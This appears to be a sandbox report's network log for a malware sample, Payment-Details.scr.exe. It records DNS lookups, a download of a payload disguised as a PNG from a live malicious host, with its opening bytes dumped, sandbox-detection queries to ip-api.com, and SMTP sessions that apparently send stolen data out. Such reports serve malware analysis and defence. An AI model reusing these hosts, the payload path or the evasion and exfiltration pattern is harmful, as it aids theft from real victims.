                                      Aug 20, 2024 18:40:09.021982908 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.021990061 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.022002935 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.027633905 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.027712107 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.027713060 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.027729034 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.027740955 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.027755976 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.027770042 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.027785063 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.027800083 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.027837038 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.027873993 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.027880907 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.033746958 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.033853054 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.033855915 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.033880949 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.033917904 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.033925056 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.043878078 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.043915987 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.043971062 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.043972969 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.043988943 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.044001102 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.044008970 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.044040918 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.044045925 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.044053078 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.044094086 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.044107914 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047368050 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047399044 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047476053 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.047476053 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.047485113 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047503948 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047523975 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047534943 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.047549009 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047583103 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.047769070 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047794104 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047836065 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.047842026 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.047873974 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.048151970 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.048188925 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.048219919 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.048242092 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.048249960 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.048265934 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.048835039 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.048883915 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.048893929 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.051393986 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.051414967 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.051431894 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.051461935 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.051461935 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.051489115 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.051505089 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.051505089 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.055958986 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.055989981 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.055999994 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.056032896 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.056076050 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.056272984 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.056314945 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.056529045 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.086575985 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.086600065 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.086632013 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.086729050 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.086760044 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.086774111 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.087940931 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.088007927 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.088062048 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.088095903 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.088104963 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.088114977 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.088129044 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.093547106 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.093575001 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.093583107 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.093595028 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.093605995 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.093625069 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.093632936 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.093652010 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.093660116 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.093689919 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.093708038 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.138569117 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:09.138603926 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:09.185369968 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:12.454277039 CEST6240280192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:12.459717989 CEST8062402208.95.112.1192.168.2.8
                                      Aug 20, 2024 18:40:12.459784031 CEST6240280192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:12.460129023 CEST6240280192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:12.464963913 CEST8062402208.95.112.1192.168.2.8
                                      Aug 20, 2024 18:40:12.942394018 CEST8062402208.95.112.1192.168.2.8
                                      Aug 20, 2024 18:40:12.997822046 CEST6240280192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:13.653721094 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:13.658809900 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:13.658894062 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:13.810734034 CEST62397587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:13.811292887 CEST6239680192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:15.469293118 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:15.469475985 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:15.470947981 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:15.470993042 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:15.472640038 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:15.472681046 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:15.476021051 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:15.476063967 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:15.480720997 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:15.826273918 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:15.826791048 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:15.831868887 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.180588007 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.190418959 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:16.195296049 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.554337025 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.554352045 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.554363966 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.554373980 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.554527044 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:16.642729044 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.647588015 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:16.652579069 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:16.996090889 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:17.011071920 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:17.015883923 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:17.375452995 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:17.375885010 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:17.381089926 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:17.724740028 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:17.725198984 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:17.731920004 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:18.090784073 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:18.091104984 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:18.096261024 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:18.439682961 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:18.440042019 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:18.444958925 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:18.851337910 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:18.851628065 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:18.856626034 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:19.199229956 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:19.199940920 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:19.199994087 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:19.200023890 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:19.200047016 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:19.204858065 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:19.204896927 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:19.204989910 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:19.204998970 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:19.807164907 CEST58762404163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:19.857274055 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:20.043104887 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:20.043169022 CEST443624015.144.130.41192.168.2.8
                                      Aug 20, 2024 18:40:20.043239117 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:20.824415922 CEST6240580192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:21.373169899 CEST8062405208.95.112.1192.168.2.8
                                      Aug 20, 2024 18:40:21.373258114 CEST6240580192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:21.373596907 CEST6240580192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:21.378453970 CEST8062405208.95.112.1192.168.2.8
                                      Aug 20, 2024 18:40:21.991127014 CEST8062405208.95.112.1192.168.2.8
                                      Aug 20, 2024 18:40:22.044740915 CEST6240580192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:22.601783037 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:22.608248949 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:22.612070084 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:22.923785925 CEST62404587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:22.924042940 CEST6240280192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:40:23.490655899 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:23.492147923 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:23.497140884 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:23.842611074 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:23.842791080 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:23.847594976 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.201710939 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.205116034 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:24.210829973 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.559838057 CEST62401443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:40:24.570748091 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.570765018 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.570776939 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.570878029 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:24.570943117 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.571362972 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:24.659082890 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:24.661778927 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:24.666688919 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:25.010375023 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:25.029658079 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:25.035697937 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:25.387506962 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:25.387989998 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:25.393188000 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:25.739423990 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:25.740081072 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:25.745090008 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:26.100974083 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:26.101512909 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:26.106362104 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:26.449290991 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:26.449743032 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:26.454678059 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:26.859632015 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:26.859989882 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:26.865058899 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:27.208726883 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:27.209537029 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:27.209589958 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:27.209614038 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:27.209636927 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:40:27.216176987 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:27.216197014 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:27.216217041 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:27.216231108 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:27.818501949 CEST58762406163.44.198.71192.168.2.8
                                      Aug 20, 2024 18:40:27.872915030 CEST62406587192.168.2.8163.44.198.71
                                      Aug 20, 2024 18:41:12.607645988 CEST6240580192.168.2.8208.95.112.1
                                      Aug 20, 2024 18:41:12.613217115 CEST8062405208.95.112.1192.168.2.8
                                      Aug 20, 2024 18:41:12.613291025 CEST6240580192.168.2.8208.95.112.1

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Aug 20, 2024 18:39:14.242361069 CEST6207853192.168.2.81.1.1.1
                                      Aug 20, 2024 18:39:14.539539099 CEST53620781.1.1.1192.168.2.8
                                      Aug 20, 2024 18:39:36.086164951 CEST53502631.1.1.1192.168.2.8
                                      Aug 20, 2024 18:39:38.791944981 CEST6404753192.168.2.81.1.1.1
                                      Aug 20, 2024 18:39:38.799237013 CEST53640471.1.1.1192.168.2.8
                                      Aug 20, 2024 18:39:40.191036940 CEST5230753192.168.2.81.1.1.1
                                      Aug 20, 2024 18:39:40.569303036 CEST53523071.1.1.1192.168.2.8

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Aug 20, 2024 18:39:14.242361069 CEST192.168.2.81.1.1.10x11bfStandard query (0)etehadshipping.comA (IP address)IN (0x0001)false
                                      Aug 20, 2024 18:39:38.791944981 CEST192.168.2.81.1.1.10xb58Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      Aug 20, 2024 18:39:40.191036940 CEST192.168.2.81.1.1.10x886aStandard query (0)nffplp.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Aug 20, 2024 18:39:14.539539099 CEST1.1.1.1192.168.2.80x11bfNo error (0)etehadshipping.com5.144.130.41A (IP address)IN (0x0001)false
                                      Aug 20, 2024 18:39:38.799237013 CEST1.1.1.1192.168.2.80xb58No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Aug 20, 2024 18:39:40.569303036 CEST1.1.1.1192.168.2.80x886aNo error (0)nffplp.com163.44.198.71A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • etehadshipping.com
                                      • ip-api.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.862396208.95.112.1802332C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 20, 2024 18:39:38.813262939 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Aug 20, 2024 18:39:39.423441887 CEST175INHTTP/1.1 200 OK
                                      Date: Tue, 20 Aug 2024 16:39:38 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 14
                                      X-Rl: 41
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.862402208.95.112.1802740C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 20, 2024 18:40:12.460129023 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Aug 20, 2024 18:40:12.942394018 CEST175INHTTP/1.1 200 OK
                                      Date: Tue, 20 Aug 2024 16:40:12 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.862405208.95.112.1802852C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 20, 2024 18:40:21.373596907 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Aug 20, 2024 18:40:21.991127014 CEST175INHTTP/1.1 200 OK
                                      Date: Tue, 20 Aug 2024 16:40:21 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 50
                                      X-Rl: 43
                                      Data Raw: 66 61 6c 73 65 0a
                                      Data Ascii: false


                                      HTTPS Connections

                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                      Aug 20, 2024 18:40:07.115243912 CEST5.144.130.41443192.168.2.862401CN=*.etehadshipping.com CN=R11, O=Let's Encrypt, C=USCN=R11, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=USThu Jun 20 14:02:00 CEST 2024 Wed Mar 13 01:00:00 CET 2024Wed Sep 18 14:01:59 CEST 2024 Sat Mar 13 00:59:59 CET 2027771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                      CN=R11, O=Let's Encrypt, C=USCN=ISRG Root X1, O=Internet Security Research Group, C=USWed Mar 13 01:00:00 CET 2024Sat Mar 13 00:59:59 CET 2027

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.8497045.144.130.41443432C:\Users\user\Desktop\Payment-Details.scr.exe
                                      TimestampBytes transferredDirectionData
                                      2024-08-20 16:39:24 UTC113OUTGET /chmod%20permission%20777/panel/Uslmwziyya.vdf HTTP/1.1
                                      Host: etehadshipping.com
                                      Connection: Keep-Alive
                                      2024-08-20 16:39:24 UTC208INHTTP/1.1 200 OK
                                      Connection: close
                                      content-type: application/octet-stream
                                      last-modified: Tue, 20 Aug 2024 13:03:12 GMT
                                      accept-ranges: bytes
                                      content-length: 1261249
                                      date: Tue, 20 Aug 2024 16:39:24 GMT
                                      2024-08-20 16:39:24 UTC1160INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 d2 00 00 03 d2 08 06 00 00 00 97 93 e2 de 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec dd 07 fc 66 df 51 17 fe f5 6f 41 54 04 0b 2a a8 20 8a 22 0a 22 20 36 9a 20 d2 45 25 34 05 c4 12 9a 80 14 e9 82 80 21 74 10 34 a0 04 41 e0 87 40 08 84 40 90 12 a9 09 1d 42 91 9e d0 6b e8 a8 a1 25 e0 fe 79 3f bf 9d 2f 9f 67 76 ee bd 4f fb ee ee 2f d9 e7 f5 3a fb dd 3b 77 ce cc 9c 39 73 e6 cc a9 f7 c6 df ff fb 7f ff e6 3f f9 27 ff e4 e6 47 7f f4 47 df bc 71 e3 c6 cd df f9 3b 7f e7 ee 6f a5 df f5 bb 7e d7 de 73 fd ea f9 8b bf f8 8b f7 de f7 f4 77 fe ce df 19 e1 77 2b bd ff fb bf ff
                                      Data Ascii: PNGIHDRsRGBgAMAapHYsodIDATx^fQoAT* "" 6 E%4!t4A@@Bk%y?/gvO/:;w9s?'GGq;o~sww+
                                      2024-08-20 16:39:25 UTC14994INData Raw: 5f ff 6b 67 57 fc 7f e5 4f fb 5f cb 2f 9e d5 c6 c4 d1 af f2 2a af 72 95 ff 83 3e e8 83 ae ea 63 2d ff 87 7d d8 87 ed ca fa b2 2f fb b2 57 7e 1c fc 95 5e e9 95 46 f9 f9 d8 cc ff c6 6f fc c6 37 3f ff f3 3f 7f 47 c3 18 40 b9 d3 ce c9 20 5e 66 5b e0 5d 9f ea 33 e9 bd f2 2b bf f2 cd 17 7c c1 17 dc f5 33 6f f7 76 6f 37 d2 4b 1a dd df 54 99 0f 49 e8 f4 fc dd 9f 1e ea af 7a db 3e d5 5f 15 dd 4a 2f f5 52 2f b5 f7 8c 5f 3e d3 5b 3e e3 d3 75 ec 99 1e ff e3 7f fc 8f 7b 6d 47 59 be e8 8b be e8 2a 06 ab b2 64 5e 69 a9 2d b2 97 de 16 bf e9 9b be 69 d7 ae ae 46 c6 6b 8d 51 47 99 3f 8c fe d3 7f fa 4f b7 09 a9 d3 eb 42 66 03 91 96 84 fc a7 ff f4 9f ee c1 34 80 4f fd d4 4f bd c5 f1 c1 5f c9 d8 69 92 f1 3f ff e7 ff 7c 0b eb c1 df 1f fe c3 7f f8 ea fd 1f ff e3 7f fc 36 65 e7
                                      Data Ascii: _kgWO_/*r>c-}/W~^Fo7??G@ ^f[]3+|3ovo7KTIz>_J/R/_>[>u{mGY*d^i-iFkQG?OBf4OO_i?|6e
